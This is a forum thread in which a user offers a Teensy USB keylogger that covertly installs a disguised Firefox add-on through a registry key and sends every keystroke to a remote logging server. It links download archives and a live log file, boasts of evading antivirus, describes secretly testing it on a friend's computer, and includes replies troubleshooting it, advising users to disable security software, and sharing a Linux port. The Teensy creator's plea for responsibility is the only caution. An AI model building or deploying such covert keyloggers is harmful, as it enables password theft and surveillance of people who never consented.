Jump to content

[Version 1] Firefox Keylogger With Ducky


sandred
 Share

Recommended Posts

By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for firefox. When teensy is inserted into usb, it uploads the plugin files into C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into firefox by adding registry key into HKCU\Software\Mozilla\Firefox\Extensions. If firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin(displayed as "Firefox Security Addon") loads when firefox starts the next time. If everything goes fine, it will be done in 10 secs.

The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it.

Please keep in mind that this is by no means a polished or optimized code, bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin supported browsers and for all OS's. I would love to see somebody optimize it.

Download the code from here

http://karmetasploit.com/KL/AllFiles.zip

if you do not bother to change the server or just want to test it, then the logs are currently stored in this location:

http://karmetasploit.com/KL/logger.txt

Some plus points with these kind of keyloggers:

  • It works behind what ever firewalls as long as Firefox gets the internet.
  • 100% AV undetectable
  • You can decide to log or not to log based on ip.

Why bother stealing cookies when you can get all the key strokes. :)

Link to comment
Share on other sites

Can you go into a little more detail on how exactly this works?

Does the FF plugin go onto a seperate thumbdrive or does it download the plugin then install it? The rest of it seems pretty straightforward..

Edited by Elementix
Link to comment
Share on other sites

You could try looking at the code!

It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.

Can you go into a little more detail on how exactly this works?

If you'd read the code, it's pretty easy to see those 11 javascript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on a HTTP get request to a particular URL. The 7 lines of PHP receives it and puts it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the jist of it.

If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kinda of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!

To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple.

I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

Edited by Paul Stoffregen
Link to comment
Share on other sites

You could try looking at the code!

It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.

If you'd read the code, it's pretty easy to see those 11 javascript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on a HTTP get request to a particular URL. The 7 lines of PHP receives it and puts it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the jist of it.

If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kinda of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!

To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple.

I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

Well thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the in's and out's of how everything works, so chill out with that crap.

With that being said, are all these files just flashed onto the teensy (besides the php script)? I'm just a bit confused...

Link to comment
Share on other sites

All the code does it is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to firefox "Hey there is a plugin that you need to load at C:\kl" and when firefox starts it loads the code . Once loaded, the plugin watches all the keystrokes made into browser and quietly posts them to the remote server. The php script is placed in the server, which then takes these keys sent and stores them to a file.

You do not need to load these files into teensy. All you need to do is compile the code in Arduino and flash the teensy with it. When you plug in the teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is with out changing anything. you can always uninstall it after testing.

Yes the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of java script running inside a browser. I already field tested it on one of my friends computer and he does not think any thing ever happened at all when teensy installed it. I had to explain him the details and even after that he does not really believe thats possible. Well educate the masses I guess.

Link to comment
Share on other sites

Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?

Link to comment
Share on other sites

Have a look in the registry to see if it adds the entry. I know Defense+ (comodo) blocks unauthorized access to the registry, try disable all your antivirus/firewall solutions and try it.

Link to comment
Share on other sites

Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?

If you have a folder C:\kl (may be from previous runs), then you have to delete it before running it again. Try that and try to plug it in with nothing else running on your computer, may be your computer is slow at multitasking and missing some keystrokes.

Link to comment
Share on other sites

Well, that's not the problem...I'm on a quad-core machine with 3 gigs of ram. I've tried it on my pc, which is running a 32-bit copy of Windows 7 and I also tried it in 2 seperate virtual machines running a fresh install of XP with firefox installed. It does seems like it's working, but everything is going so fast I can't even see if there are any errors being displayed...

All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with right?

Link to comment
Share on other sites

Well, apparently it just decided that it wanted to start working....Thanks anyway guys. :)

Edit: Ok, so it worked on a new virtual machine with XP but it doesn't seem to want to work with my clean install of Windows 7 on my actual machine.. *sigh*...guess I'll keep playing with it...

Edited by Elementix
Link to comment
Share on other sites

It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different..

Link to comment
Share on other sites

  • 4 weeks later...
I have put them back. Let me know if you have a problem.

Sandyreddy,

Thanks for putting this back up. I had a little trouble compiling it in Arduino due to it not finding the header file. After renaming the header file the whole thing worked like a charm.

Specs:

- 32 bit XP as a VM

- Firefox version 3.5.7.

Fitzdaddy

Link to comment
Share on other sites

Fellow Teensy Fans,

Here is my wack at the keylogger for Firefox. I have done a little house cleaning on the source code (neat freak) and added support for Linux. Currently I use the command <pre>gnome-terminal</pre> to get a shell so it will only work in Gnome Linux distributions. For some reason the Arduino IDE did not like the name keylogger anymore so I had to rename it.

Future improvements could be to suppress notification of additional extensions and cleaning up the presentation of the windows command prompt.

I hope it is clear from the source code that much credit goes to Sandyreddy and those that he got inspiration from.

http://dl.dropbox.com/u/1588928/fflogger.tar.gz

Fitzdaddy

Link to comment
Share on other sites

  • 1 year later...

So smart to have a deep study on keylogger things, Sandred. I think it is very difficult and complicated......so even when i needed one to use on my laptop, i just bought one online with knowing nothing about it. But luck is that it works not bad.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...